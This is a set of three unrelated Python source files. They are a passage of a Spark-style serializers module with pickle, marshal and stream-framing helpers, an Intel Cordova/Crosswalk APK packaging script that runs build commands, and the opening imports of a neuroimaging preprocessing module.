""" Hack namedtuple() to make it picklable """
# hijack only one time
if hasattr(collections.namedtuple, "__hijack"):
return
global _old_namedtuple # or it will put in closure
global _old_namedtuple_kwdefaults # or it will put in closure too
def _copy_func(f):
return types.FunctionType(f.__code__, f.__globals__, f.__name__,
f.__defaults__, f.__closure__)
_old_namedtuple = _copy_func(collections.namedtuple)
_old_namedtuple_kwdefaults = collections.namedtuple.__kwdefaults__
def namedtuple(*args, **kwargs):
for k, v in _old_namedtuple_kwdefaults.items():
kwargs[k] = kwargs.get(k, v)
cls = _old_namedtuple(*args, **kwargs)
return _hack_namedtuple(cls)
# replace namedtuple with the new one
collections.namedtuple.__globals__["_old_namedtuple_kwdefaults"] = _old_namedtuple_kwdefaults
collections.namedtuple.__globals__["_old_namedtuple"] = _old_namedtuple
collections.namedtuple.__globals__["_hack_namedtuple"] = _hack_namedtuple
collections.namedtuple.__code__ = namedtuple.__code__
collections.namedtuple.__hijack = 1
# hack the cls already generated by namedtuple.
# Those created in other modules can be pickled as normal,
# so only hack those in __main__ module
for n, o in sys.modules["__main__"].__dict__.items():
if (type(o) is type and o.__base__ is tuple
and hasattr(o, "_fields")
and "__reduce__" not in o.__dict__):
_hack_namedtuple(o) # hack inplace
_hijack_namedtuple()
class PickleSerializer(FramedSerializer):
"""
Serializes objects using Python's pickle serializer:
http://docs.python.org/2/library/pickle.html
This serializer supports nearly any Python object, but may
not be as fast as more specialized serializers.
"""
def dumps(self, obj):
return pickle.dumps(obj, pickle_protocol)
def loads(self, obj, encoding="bytes"):
return pickle.loads(obj, encoding=encoding)
class CloudPickleSerializer(PickleSerializer):
def dumps(self, obj):
try:
return cloudpickle.dumps(obj, pickle_protocol)
except pickle.PickleError:
raise
except Exception as e:
emsg = str(e)
if "'i' format requires" in emsg:
msg = "Object too large to serialize: %s" % emsg
else:
msg = "Could not serialize object: %s: %s" % (e.__class__.__name__, emsg)
print_exec(sys.stderr)
raise pickle.PicklingError(msg)
class MarshalSerializer(FramedSerializer):
"""
Serializes objects using Python's Marshal serializer:
http://docs.python.org/2/library/marshal.html
This serializer is faster than PickleSerializer but supports fewer datatypes.
"""
def dumps(self, obj):
return marshal.dumps(obj)
def loads(self, obj):
return marshal.loads(obj)
class AutoSerializer(FramedSerializer):
"""
Choose marshal or pickle as serialization protocol automatically
"""
def __init__(self):
FramedSerializer.__init__(self)
self._type = None
def dumps(self, obj):
if self._type is not None:
return b'P' + pickle.dumps(obj, -1)
try:
return b'M' + marshal.dumps(obj)
except Exception:
self._type = b'P'
return b'P' + pickle.dumps(obj, -1)
def loads(self, obj):
_type = obj[0]
if _type == b'M':
return marshal.loads(obj[1:])
elif _type == b'P':
return pickle.loads(obj[1:])
else:
raise ValueError("invalid serialization type: %s" % _type)
class CompressedSerializer(FramedSerializer):
"""
Compress the serialized data
"""
def __init__(self, serializer):
FramedSerializer.__init__(self)
assert isinstance(serializer, FramedSerializer), "serializer must be a FramedSerializer"
self.serializer = serializer
def dumps(self, obj):
return zlib.compress(self.serializer.dumps(obj), 1)
def loads(self, obj):
return self.serializer.loads(zlib.decompress(obj))
def __repr__(self):
return "CompressedSerializer(%s)" % self.serializer
class UTF8Deserializer(Serializer):
"""
Deserializes streams written by String.getBytes.
"""
def __init__(self, use_unicode=True):
self.use_unicode = use_unicode
def loads(self, stream):
length = read_int(stream)
if length == SpecialLengths.END_OF_DATA_SECTION:
raise EOFError
elif length == SpecialLengths.NULL:
return None
s = stream.read(length)
return s.decode("utf-8") if self.use_unicode else s
def load_stream(self, stream):
try:
while True:
yield self.loads(stream)
except struct.error:
return
except EOFError:
return
def __repr__(self):
return "UTF8Deserializer(%s)" % self.use_unicode
def read_long(stream):
length = stream.read(8)
if not length:
raise EOFError
return struct.unpack("!q", length)[0]
def write_long(value, stream):
stream.write(struct.pack("!q", value))
def pack_long(value):
return struct.pack("!q", value)
def read_int(stream):
length = stream.read(4)
if not length:
raise EOFError
return struct.unpack("!i", length)[0]
def write_int(value, stream):
stream.write(struct.pack("!i", value))
def read_bool(stream):
length = stream.read(1)
if not length:
raise EOFError
return struct.unpack("!?", length)[0]
def write_with_length(obj, stream):
write_int(len(obj), stream)
stream.write(obj)
class ChunkedStream(object):
"""
This is a file-like object takes a stream of data, of unknown length, and breaks it into fixed
length frames. The intended use case is serializing large data and sending it immediately over
a socket -- we do not want to buffer the entire data before sending it, but the receiving end
needs to know whether or not there is more data coming.
It works by buffering the incoming data in some fixed-size chunks. If the buffer is full, it
first sends the buffer size, then the data. This repeats as long as there is more data to send.
When this is closed, it sends the length of whatever data is in the buffer, then that data, and
finally a "length" of -1 to indicate the stream has completed.
"""
def __init__(self, wrapped, buffer_size):
self.buffer_size = buffer_size
self.buffer = bytearray(buffer_size)
self.current_pos = 0
self.wrapped = wrapped
def write(self, bytes):
byte_pos = 0
byte_remaining = len(bytes)
while byte_remaining > 0:
new_pos = byte_remaining + self.current_pos
if new_pos < self.buffer_size:
# just put it in our buffer
self.buffer[self.current_pos:new_pos] = bytes[byte_pos:]
self.current_pos = new_pos
byte_remaining = 0
else:
# fill the buffer, send the length then the contents, and start filling again
space_left = self.buffer_size - self.current_pos
new_byte_pos = byte_pos + space_left
self.buffer[self.current_pos:self.buffer_size] = bytes[byte_pos:new_byte_pos]
write_int(self.buffer_size, self.wrapped)
self.wrapped.write(self.buffer)
byte_remaining -= space_left
byte_pos = new_byte_pos
self.current_pos = 0
def close(self):
# if there is anything left in the buffer, write it out first
if self.current_pos > 0:
write_int(self.current_pos, self.wrapped)
self.wrapped.write(self.buffer[:self.current_pos])
# -1 length indicates to the receiving end that we're done.
write_int(-1, self.wrapped)
self.wrapped.close()
@property
def closed(self):
"""
Return True if the `wrapped` object has been closed.
NOTE: this property is required by pyarrow to be used as a file-like object in
pyarrow.RecordBatchStreamWriter from ArrowStreamSerializer
"""
return self.wrapped.closed
if __name__ == '__main__':
import doctest
(failure_count, test_count) = doctest.testmod()
if failure_count:
sys.exit(-1)
|
|
#!/usr/bin/env python
#
# Copyright (c) 2015 Intel Corporation.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of works must retain the original copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the original copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Intel Corporation nor the names of its contributors
# may be used to endorse or promote products derived from this work without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors:
# Fan, Yugang <yugang.fan@intel.com>
# Lin, Wanming <wanming.lin@intel.com>
import os
import shutil
import glob
import time
import sys
import stat
import random
import json
import logging
import signal
import commands
import fnmatch
import subprocess
import re
import pexpect
from optparse import OptionParser
reload(sys)
sys.setdefaultencoding('utf8')
TOOL_VERSION = "v0.1"
VERSION_FILE = "VERSION"
DEFAULT_CMD_TIMEOUT = 600
PKG_NAMES = ["gallery", "helloworld", "remotedebugging", "mobilespec"]
CORDOVA_VERSIONS = ["3.6", "4.0"]
PKG_MODES = ["shared", "embedded"]
PKG_ARCHS = ["x86", "arm"]
BUILD_PARAMETERS = None
BUILD_ROOT = None
LOG = None
LOG_LEVEL = logging.DEBUG
BUILD_TIME = time.strftime('%Y%m%d', time.localtime(time.time()))
class ColorFormatter(logging.Formatter):
def __init__(self, msg):
logging.Formatter.__init__(self, msg)
def format(self, record):
red, green, yellow, blue = range(4)
colors = {'INFO': green, 'DEBUG': blue,
'WARNING': yellow, 'ERROR': red}
msg = record.msg
if msg[0] == "+":
msg = "\33[01m" + msg[1:] + "\033[0m"
elif msg[0] == "=":
msg = "\33[07m" + msg + "\033[0m"
levelname = record.levelname
if levelname in colors:
msg_color = "\033[0;%dm" % (
31 + colors[levelname]) + msg + "\033[0m"
record.msg = msg_color
return logging.Formatter.format(self, record)
def replaceUserString(path, fnexp, old_s, new_s):
for sub_file in iterfindfiles(path, fnexp):
try:
with open(sub_file, 'r') as sub_read_obj:
read_string = sub_read_obj.read()
except IOError as err:
LOG.error("Read %s Error : " % sub_file + str(err))
continue
if read_string.find(old_s) >= 0:
try:
with open(sub_file, 'w') as sub_write_obj:
sub_write_obj.write(re.sub(old_s, new_s, read_string))
except IOError as err:
LOG.error("Modify %s Error : " % sub_file + str(err))
continue
def iterfindfiles(path, fnexp):
for root, dirs, files in os.walk(path):
for filename in fnmatch.filter(files, fnexp):
yield os.path.join(root, filename)
def isWindows():
return sys.platform == "cygwin" or sys.platform.startswith("win")
def killProcesses(ppid=None):
if isWindows():
subprocess.check_call("TASKKILL /F /PID %s /T" % ppid)
else:
ppid = str(ppid)
pidgrp = []
def GetChildPids(ppid):
command = "ps -ef | awk '{if ($3 ==%s) print $2;}'" % str(ppid)
pids = os.popen(command).read()
pids = pids.split()
return pids
pidgrp.extend(GetChildPids(ppid))
for pid in pidgrp:
pidgrp.extend(GetChildPids(pid))
pidgrp.insert(0, ppid)
while len(pidgrp) > 0:
pid = pidgrp.pop()
try:
os.kill(int(pid), signal.SIGKILL)
return True
except OSError:
try:
os.popen("kill -9 %d" % int(pid))
return True
except Exception:
return False
def checkContains(origin_str=None, key_str=None):
if origin_str.upper().find(key_str.upper()) >= 0:
return True
return False
def getRandomStr():
str_pool = list("abcdefghijklmnopqrstuvwxyz1234567890")
random_str = ""
for i in range(15):
index = random.randint(0, len(str_pool) - 1)
random_str = random_str + str_pool[index]
return random_str
def overwriteCopy(src, dest, symlinks=False, ignore=None):
if not os.path.exists(dest):
os.makedirs(dest)
shutil.copystat(src, dest)
sub_list = os.listdir(src)
if ignore:
excl = ignore(src, sub_list)
sub_list = [x for x in sub_list if x not in excl]
for i_sub in sub_list:
s_path = os.path.join(src, i_sub)
d_path = os.path.join(dest, i_sub)
if symlinks and os.path.islink(s_path):
if os.path.lexists(d_path):
os.remove(d_path)
os.symlink(os.readlink(s_path), d_path)
try:
s_path_s = os.lstat(s_path)
s_path_mode = stat.S_IMODE(s_path_s.st_mode)
os.lchmod(d_path, s_path_mode)
except Exception:
pass
elif os.path.isdir(s_path):
overwriteCopy(s_path, d_path, symlinks, ignore)
else:
shutil.copy2(s_path, d_path)
def doCopy(src_item=None, dest_item=None):
LOG.info("Copying %s to %s" % (src_item, dest_item))
try:
if os.path.isdir(src_item):
overwriteCopy(src_item, dest_item, symlinks=True)
else:
if not os.path.exists(os.path.dirname(dest_item)):
LOG.info("Create non-existent dir: %s" %
os.path.dirname(dest_item))
os.makedirs(os.path.dirname(dest_item))
shutil.copy2(src_item, dest_item)
except Exception as e:
LOG.error("Fail to copy file %s: %s" % (src_item, e))
return False
return True
def doRemove(target_file_list=None):
for i_file in target_file_list:
LOG.info("Removing %s" % i_file)
try:
if os.path.isdir(i_file):
shutil.rmtree(i_file)
else:
os.remove(i_file)
except Exception as e:
LOG.error("Fail to remove file %s: %s" % (i_file, e))
return False
return True
def exitHandler(return_code=1):
LOG.info("+Cleaning build root folder ...")
if not BUILD_PARAMETERS.bnotclean and os.path.exists(BUILD_ROOT):
if not doRemove([BUILD_ROOT]):
LOG.error("Fail to clean build root, exit ...")
sys.exit(1)
if return_code == 0:
LOG.info("================ DONE ================")
else:
LOG.error(
"================ Found Something Wrong !!! ================")
sys.exit(return_code)
def prepareBuildRoot():
LOG.info("+Preparing build root folder ...")
global BUILD_ROOT
while True:
BUILD_ROOT = os.path.join("/tmp", getRandomStr())
if os.path.exists(BUILD_ROOT):
continue
else:
break
if not doRemove(
glob.glob(os.path.join("%s*.apk" % PKG_NAME))):
return False
return True
def doCMD(cmd, time_out=DEFAULT_CMD_TIMEOUT, no_check_return=False):
LOG.info("Doing CMD: [ %s ]" % cmd)
pre_time = time.time()
cmd_proc = subprocess.Popen(args=cmd, shell=True)
while True:
cmd_exit_code = cmd_proc.poll()
elapsed_time = time.time() - pre_time
if cmd_exit_code is None:
if elapsed_time >= time_out:
killProcesses(ppid=cmd_proc.pid)
LOG.error("Timeout to exe CMD")
return False
else:
if not no_check_return and cmd_exit_code != 0:
LOG.error("Fail to exe CMD")
return False
break
time.sleep(2)
return True
def replaceKey(file_path, content, key):
f = open(file_path, "r")
f_content = f.read()
f.close()
pos = f_content.find(key)
if pos != -1:
f_content = f_content.replace(key, content)
# content = content[:(pos-1)] + line_content + "\n" + key + "\n" + content[pos:]
f = open(file_path, "w")
f.write(f_content)
f.close()
else:
LOG.error(
"Fail to replace: %s with: %s in file: %s" %
(content, key, file_path))
return False
return True
def packMobileSpec(app_name=None):
pack_tool = os.path.join(BUILD_ROOT, "cordova")
if not os.path.exists(pack_tool):
if not doCopy(
os.path.join(BUILD_PARAMETERS.pkgpacktools, "cordova"),
pack_tool):
return False
orig_dir = os.getcwd()
os.chdir(pack_tool)
if BUILD_PARAMETERS.pkgmode == "shared":
pack_cmd = "bin/create mobilespec org.apache.mobilespec mobilespec --xwalk-shared-library"
else:
pack_cmd = "bin/create mobilespec org.apache.mobilespec mobilespec"
if not doCMD(pack_cmd, DEFAULT_CMD_TIMEOUT):
os.chdir(orig_dir)
return False
mobilespec_src = os.path.join(BUILD_ROOT, "mobilespec_src")
if not os.path.exists(mobilespec_src):
if not doCopy(
os.path.join(BUILD_PARAMETERS.pkgpacktools, "mobilespec"),
mobilespec_src):
return False
if not doCopy(
os.path.join(pack_tool, "mobilespec", "CordovaLib"),
os.path.join(mobilespec_src, "platforms", "android", "CordovaLib")):
return False
if not doCopy(
os.path.join(pack_tool, "VERSION"),
os.path.join(mobilespec_src, "platforms", "android")):
return False
os.chdir(os.path.join(mobilespec_src, "platforms", "android"))
ANDROID_HOME = "echo $(dirname $(dirname $(which android)))"
updateproject_cmd = "android update project --subprojects --path . --target \"android-21\""
antdebug_cmd = "ant debug"
build_cmd = "cordova build android"
os.environ['ANDROID_HOME'] = commands.getoutput(ANDROID_HOME)
if not doCMD(updateproject_cmd, DEFAULT_CMD_TIMEOUT):
os.chdir(orig_dir)
return False
os.chdir(
os.path.join(
mobilespec_src,
"platforms",
"android",
"CordovaLib"))
if not doCMD(antdebug_cmd, DEFAULT_CMD_TIMEOUT):
os.chdir(orig_dir)
return False
os.chdir(mobilespec_src)
if not doCMD(build_cmd, DEFAULT_CMD_TIMEOUT):
os.chdir(orig_dir)
return False
app_dir = os.path.join(mobilespec_src, "platforms", "android", "out")
if not doCopy(os.path.join(app_dir, "%s-debug.apk" % app_name),
os.path.join(orig_dir, "%s.apk" % app_name)):
if not doCopy(os.path.join(app_dir, "%s-debug-unaligned.apk" % app_name),
os.path.join(orig_dir, "%s.apk" % app_name)):
os.chdir(orig_dir)
return False
os.chdir(orig_dir)
return True
def packSampleApp(app_name=None):
pack_tool = os.path.join(BUILD_ROOT, "cordova")
if not os.path.exists(pack_tool):
if not doCopy(
os.path.join(BUILD_PARAMETERS.pkgpacktools, "cordova"),
pack_tool):
return False
orig_dir = os.getcwd()
os.chdir(pack_tool)
if BUILD_PARAMETERS.pkgmode == "shared":
pack_cmd = "bin/create " + app_name + " com.example." + \
app_name + " " + app_name + " --xwalk-shared-library"
else:
pack_cmd = "bin/create " + app_name + " com.example." + \
app_name + " " + app_name + " --shared"
if not doCMD(pack_cmd, DEFAULT_CMD_TIMEOUT):
os.chdir(orig_dir)
return False
if checkContains(app_name, "GALLERY"):
getsource_cmd = "git clone https://github.com/blueimp/Gallery"
if not doCMD(getsource_cmd, DEFAULT_CMD_TIMEOUT):
os.chdir(orig_dir)
return False
if not doRemove(
glob.glob(os.path.join(pack_tool, app_name, "assets", "www"))):
os.chdir(orig_dir)
return False
if not doCopy(os.path.join(pack_tool, "Gallery"),
os.path.join(pack_tool, app_name, "assets", "www")):
os.chdir(orig_dir)
return False
if checkContains(app_name, "HELLOWORLD"):
if not replaceKey(os.path.join(pack_tool, app_name, "assets", "www", "index.html"),
"<a href='http://www.intel.com'>Intel</a>\n</body>",
"</body>"):
os.chdir(orig_dir)
return False
os.chdir(os.path.join(pack_tool, app_name))
if BUILD_PARAMETERS.cordovaversion == "4.0":
if BUILD_PARAMETERS.pkgarch == "x86":
cordova_tmp_path = os.path.join(
BUILD_ROOT,
"cordova",
app_name,
"build",
"outputs",
"apk",
"%s-x86-debug.apk" %
app_name)
else:
cordova_tmp_path = os.path.join(
BUILD_ROOT,
"cordova",
app_name,
"build",
"outputs",
"apk",
"%s-armv7-debug.apk" %
app_name)
plugin_tool = os.path.join(
BUILD_ROOT,
"cordova_plugins",
"cordova-crosswalk-engine")
if not os.path.exists(plugin_tool):
if not doCopy(
os.path.join(
BUILD_PARAMETERS.pkgpacktools,
"cordova_plugins",
"cordova-crosswalk-engine"),
plugin_tool):
return False
plugin_install_cmd = "plugman install --platform android --project " \
"./ --plugin %s" % plugin_tool
if not doCMD(plugin_install_cmd, DEFAULT_CMD_TIMEOUT):
os.chdir(orig_dir)
return False
else:
cordova_tmp_path = os.path.join(
BUILD_ROOT,
"cordova",
app_name,
"bin",
"%s-debug.apk" %
app_name)
pack_cmd = "./cordova/build"
if checkContains(app_name, "REMOTEDEBUGGING"):
pack_cmd = "./cordova/build --debug"
ANDROID_HOME = "echo $(dirname $(dirname $(which android)))"
os.environ['ANDROID_HOME'] = commands.getoutput(ANDROID_HOME)
if not doCMD(pack_cmd, DEFAULT_CMD_TIMEOUT):
pack_cmd = "ant debug"
if not doCMD(pack_cmd, DEFAULT_CMD_TIMEOUT):
os.chdir(orig_dir)
return False
if not doCopy(cordova_tmp_path,
os.path.join(orig_dir, app_name + ".apk")):
os.chdir(orig_dir)
return False
os.chdir(orig_dir)
return True
def packMobileSpec_cli(app_name=None):
project_root = os.path.join(BUILD_ROOT, app_name)
output = commands.getoutput("cordova -v")
if output != "5.0.0":
LOG.error(
"Cordova 4.0 build requires Cordova-CLI 5.0.0, install with command: '$ sudo npm install cordova@5.0.0 -g'")
return False
plugin_tool = os.path.join(BUILD_ROOT, "cordova-plugin-crosswalk-webview")
if not doCopy(os.path.join(BUILD_PARAMETERS.pkgpacktools,
"cordova_plugins", "cordova-plugin-crosswalk-webview"), plugin_tool):
return False
cordova_mobilespec = os.path.join(BUILD_ROOT, "cordova-mobile-spec")
if not doCopy(os.path.join(BUILD_PARAMETERS.pkgpacktools,
"mobilespec", "cordova-mobile-spec"), cordova_mobilespec):
return False
cordova_coho = os.path.join(BUILD_ROOT, "cordova-coho")
if not doCopy(os.path.join(
BUILD_PARAMETERS.pkgpacktools, "mobilespec", "cordova-coho"), cordova_coho):
return False
orig_dir = os.getcwd()
os.chdir(cordova_coho)
output = commands.getoutput("git pull").strip("\r\n")
os.chdir(cordova_mobilespec)
output = commands.getoutput("git pull").strip("\r\n")
if output == "Already up-to-date.":
if not doCopy(os.path.join(
BUILD_PARAMETERS.pkgpacktools, "mobilespec", "mobilespec"), project_root):
return False
else:
node_modules = os.path.join(
cordova_mobilespec,
"createmobilespec",
"node_modules")
os.chdir(os.path.join(cordova_mobilespec, "createmobilespec"))
install_cmd = "sudo npm install"
LOG.info("Doing CMD: [ %s ]" % install_cmd)
run = pexpect.spawn(install_cmd)
index = run.expect(
['password', 'node_modules', pexpect.EOF, pexpect.TIMEOUT])
if index == 0:
run.sendline(BUILD_PARAMETERS.userpassword)
index = run.expect(
['node_modules', 'password', pexpect.EOF, pexpect.TIMEOUT])
if index == 0:
print 'The user password is Correctly'
else:
print 'The user password is wrong'
run.close(force=True)
return False
elif index != 1:
print 'The user password is wrong'
run.close(force=True)
return False
os.chdir(BUILD_ROOT)
createmobilespec_cmd = "cordova-mobile-spec/createmobilespec/createmobilespec.js --android --global"
if not doCMD(createmobilespec_cmd, DEFAULT_CMD_TIMEOUT * 3):
os.chdir(orig_dir)
return False
os.chdir(project_root)
mv_cmd = "mv platforms/android/src/org/apache/mobilespec/MainActivity.java platforms/android/src/org/apache/mobilespec/mobilespec.java"
if not doCMD(mv_cmd, DEFAULT_CMD_TIMEOUT):
os.chdir(orig_dir)
return False
sed_cmd = "sed -i 's/MainActivity/mobilespec/g' `grep MainActivity -rl *`"
if not doCMD(sed_cmd, DEFAULT_CMD_TIMEOUT):
os.chdir(orig_dir)
return False
os.chdir(project_root)
add_webview_cmd = "cordova plugin add ../cordova-plugin-crosswalk-webview/"
if not doCMD(add_webview_cmd, DEFAULT_CMD_TIMEOUT):
os.chdir(orig_dir)
return False
ANDROID_HOME = "echo $(dirname $(dirname $(which android)))"
os.environ['ANDROID_HOME'] = commands.getoutput(ANDROID_HOME)
pack_cmd = "cordova build android"
if not doCMD(pack_cmd, DEFAULT_CMD_TIMEOUT):
os.chdir(orig_dir)
return False
outputs_dir = os.path.join(
project_root,
"platforms",
"android",
"build",
"outputs",
"apk")
if BUILD_PARAMETERS.pkgarch == "x86":
cordova_tmp_path = os.path.join(
outputs_dir,
"%s-x86-debug.apk" %
app_name)
cordova_tmp_path_spare = os.path.join(
outputs_dir,
"android-x86-debug.apk")
else:
cordova_tmp_path = os.path.join(
outputs_dir,
"%s-armv7-debug.apk" %
app_name)
cordova_tmp_path_spare = os.path.join(
outputs_dir,
"android-armv7-debug.apk")
if os.path.exists(cordova_tmp_path):
if not doCopy(
cordova_tmp_path, os.path.join(orig_dir, "%s.apk" % app_name)):
os.chdir(orig_dir)
return False
elif os.path.exists(cordova_tmp_path_spare):
if not doCopy(
cordova_tmp_path_spare, os.path.join(orig_dir, "%s.apk" % app_name)):
os.chdir(orig_dir)
return False
else:
os.chdir(orig_dir)
return False
os.chdir(orig_dir)
return True
def packSampleApp_cli(app_name=None):
project_root = os.path.join(BUILD_ROOT, app_name)
output = commands.getoutput("cordova -v")
if output != "5.0.0":
LOG.error(
"Cordova 4.0 build requires Cordova-CLI 5.0.0, install with command: '$ sudo npm install cordova@5.0.0 -g'")
return False
plugin_tool = os.path.join(BUILD_ROOT, "cordova_plugins")
if not os.path.exists(plugin_tool):
if not doCopy(
os.path.join(BUILD_PARAMETERS.pkgpacktools, "cordova_plugins"),
plugin_tool):
return False
orig_dir = os.getcwd()
os.chdir(BUILD_ROOT)
pack_cmd = "cordova create %s com.example.%s %s" % (
app_name, app_name, app_name)
if not doCMD(pack_cmd, DEFAULT_CMD_TIMEOUT):
os.chdir(orig_dir)
return False
# Set activity name as app_name
replaceUserString(
project_root,
'config.xml',
'<widget',
'<widget android-activityName="%s"' %
app_name)
# Workaround for XWALK-3679
replaceUserString(
project_root,
'config.xml',
'</widget>',
' <allow-navigation href="*" />\n</widget>')
if checkContains(app_name, "GALLERY"):
getsource_cmd = "git clone https://github.com/blueimp/Gallery"
if not doCMD(getsource_cmd, DEFAULT_CMD_TIMEOUT):
os.chdir(orig_dir)
return False
if not doRemove(glob.glob(os.path.join(project_root, "www"))):
os.chdir(orig_dir)
return False
if not doCopy(os.path.join(BUILD_ROOT, "Gallery"),
os.path.join(project_root, "www")):
os.chdir(orig_dir)
return False
if checkContains(app_name, "HELLOWORLD"):
if not replaceKey(os.path.join(project_root, "www", "index.html"),
"<a href='http://www.intel.com'>Intel</a>\n</body>",
"</body>"):
os.chdir(orig_dir)
return False
os.chdir(project_root)
pack_cmd = "cordova platform add android"
if not doCMD(pack_cmd, DEFAULT_CMD_TIMEOUT):
os.chdir(orig_dir)
return False
plugin_dirs = os.listdir(plugin_tool)
for i_dir in plugin_dirs:
i_plugin_dir = os.path.join(plugin_tool, i_dir)
plugin_install_cmd = "cordova plugin add %s" % i_plugin_dir
if not doCMD(plugin_install_cmd, DEFAULT_CMD_TIMEOUT):
os.chdir(orig_dir)
return False
ANDROID_HOME = "echo $(dirname $(dirname $(which android)))"
os.environ['ANDROID_HOME'] = commands.getoutput(ANDROID_HOME)
pack_cmd = "cordova build android"
if checkContains(app_name, "REMOTEDEBUGGING"):
pack_cmd = "cordova build android --debug"
if not doCMD(pack_cmd, DEFAULT_CMD_TIMEOUT):
os.chdir(orig_dir)
return False
outputs_dir = os.path.join(
project_root,
"platforms",
"android",
"build",
"outputs",
"apk")
if BUILD_PARAMETERS.pkgarch == "x86":
cordova_tmp_path = os.path.join(
outputs_dir,
"%s-x86-debug.apk" %
app_name)
cordova_tmp_path_spare = os.path.join(
outputs_dir,
"android-x86-debug.apk")
else:
cordova_tmp_path = os.path.join(
outputs_dir,
"%s-armv7-debug.apk" %
app_name)
cordova_tmp_path_spare = os.path.join(
outputs_dir,
"android-armv7-debug.apk")
if not os.path.exists(cordova_tmp_path):
if not doCopy(
cordova_tmp_path_spare, os.path.join(orig_dir, "%s.apk" % app_name)):
os.chdir(orig_dir)
return False
else:
if not doCopy(
cordova_tmp_path, os.path.join(orig_dir, "%s.apk" % app_name)):
os.chdir(orig_dir)
return False
os.chdir(orig_dir)
return True
def packAPP(app_name=None):
LOG.info("Packing %s" % (app_name))
if checkContains(app_name, "MOBILESPEC"):
if BUILD_PARAMETERS.cordovaversion == "4.0":
if not BUILD_PARAMETERS.userpassword:
LOG.error("User password is required")
return False
if not packMobileSpec_cli(app_name):
return False
else:
if not packMobileSpec(app_name):
return False
else:
if BUILD_PARAMETERS.cordovaversion == '4.0':
if not packSampleApp_cli(app_name):
return False
else:
if not packSampleApp(app_name):
return False
LOG.info("Success to pack APP: %s" % app_name)
return True
def main():
global LOG
LOG = logging.getLogger("pack-tool")
LOG.setLevel(LOG_LEVEL)
stream_handler = logging.StreamHandler()
stream_handler.setLevel(LOG_LEVEL)
stream_formatter = ColorFormatter("[%(asctime)s] %(message)s")
stream_handler.setFormatter(stream_formatter)
LOG.addHandler(stream_handler)
try:
usage = "Usage: ./pack.py -t apk -m shared -a x86"
opts_parser = OptionParser(usage=usage)
opts_parser.add_option(
"-n",
"--name",
dest="pkgname",
help="specify the pkg name, e.g. gallery, helloworld, remotedebugging, mobilespec ...")
opts_parser.add_option(
"--cordova-version",
dest="cordovaversion",
help="specify the cordova, e.g. 3.6, 4.0 ...")
opts_parser.add_option(
"--tools",
dest="pkgpacktools",
help="specify the parent folder of pack tools")
opts_parser.add_option(
"--notclean",
dest="bnotclean",
action="store_true",
help="disable the build root clean after the packing")
opts_parser.add_option(
"-v",
"--version",
dest="bversion",
action="store_true",
help="show this tool's version")
opts_parser.add_option(
"-m",
"--mode",
dest="pkgmode",
help="specify the apk mode, not for cordova version 4.0, e.g. shared, embedded")
opts_parser.add_option(
"-a",
"--arch",
dest="pkgarch",
help="specify the apk arch, not for cordova version 3.6, e.g. x86, arm")
opts_parser.add_option(
"-p",
"--password",
dest="userpassword",
help="specify the user password of PC")
if len(sys.argv) == 1:
sys.argv.append("-h")
global BUILD_PARAMETERS
(BUILD_PARAMETERS, args) = opts_parser.parse_args()
except Exception as e:
LOG.error("Got wrong options: %s, exit ..." % e)
sys.exit(1)
if BUILD_PARAMETERS.bversion:
print "Version: %s" % TOOL_VERSION
sys.exit(0)
if not BUILD_PARAMETERS.pkgname:
LOG.error("No pkg name provided, exit ...")
sys.exit(1)
elif not BUILD_PARAMETERS.pkgname in PKG_NAMES:
LOG.error("Wrong pkg name, only support: %s, exit ..." %
PKG_NAMES)
sys.exit(1)
if not BUILD_PARAMETERS.cordovaversion:
LOG.error("No cordova version provided, exit ...")
sys.exit(1)
elif not BUILD_PARAMETERS.cordovaversion in CORDOVA_VERSIONS:
LOG.error("Wrong cordova version, only support: %s, exit ..." %
CORDOVA_VERSIONS)
sys.exit(1)
if BUILD_PARAMETERS.pkgarch and not BUILD_PARAMETERS.pkgarch in PKG_ARCHS:
LOG.error("Wrong pkg-arch, only support: %s, exit ..." %
PKG_ARCHS)
sys.exit(1)
if BUILD_PARAMETERS.pkgmode and not BUILD_PARAMETERS.pkgmode in PKG_MODES:
LOG.error("Wrong pkg-mode, only support: %s, exit ..." %
PKG_MODES)
sys.exit(1)
if BUILD_PARAMETERS.cordovaversion == '3.6' and BUILD_PARAMETERS.pkgarch:
LOG.error("Command -a is not for cordova version 3.6")
sys.exit(1)
if BUILD_PARAMETERS.cordovaversion == '4.0' and BUILD_PARAMETERS.pkgmode:
LOG.error("Command -m is only for cordova version 3.6")
sys.exit(1)
if not BUILD_PARAMETERS.pkgpacktools:
BUILD_PARAMETERS.pkgpacktools = os.path.join(
os.getcwd(),
"..",
"..",
"tools")
BUILD_PARAMETERS.pkgpacktools = os.path.expanduser(
BUILD_PARAMETERS.pkgpacktools)
config_json = None
global PKG_NAME, CORDOVA_VERSION
PKG_NAME = BUILD_PARAMETERS.pkgname
CORDOVA_VERSION = BUILD_PARAMETERS.cordovaversion
LOG.info("================= %s (cordova-%s) ================" %
(PKG_NAME, CORDOVA_VERSION))
if not prepareBuildRoot():
exitHandler(1)
LOG.info("+Building package APP ...")
if not packAPP(PKG_NAME):
exitHandler(1)
if __name__ == "__main__":
main()
exitHandler(0)
|
|
# TODO: keep only classes, move functions to _utils, rename to preprocessor
import os
import numpy as np
from scipy.io import savemat
import nibabel
import nipype.interfaces.spm as spm
from nipype.interfaces import fsl
